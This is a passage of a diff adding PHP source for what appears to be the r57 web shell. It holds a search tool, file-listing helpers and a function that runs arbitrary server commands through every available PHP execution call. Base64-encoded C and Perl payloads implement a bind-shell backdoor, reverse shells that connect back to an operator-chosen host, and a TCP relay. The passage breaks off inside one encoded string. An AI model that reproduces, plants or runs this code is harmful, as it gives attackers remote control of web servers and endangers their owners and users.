$sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if($windows&&!$safe_mode) + { + $uname = ex("ver"); + if(empty($uname)) { $safe_mode = 1; } + } +else if($unix&&!$safe_mode) + { + $uname = ex("uname"); + if(empty($uname)) { $safe_mode = 1; } + } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Ðе могу запиÑать в файл '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Ðе могу прочитать файл '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "Ðе удалоÑÑŒ Ñоздать "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG 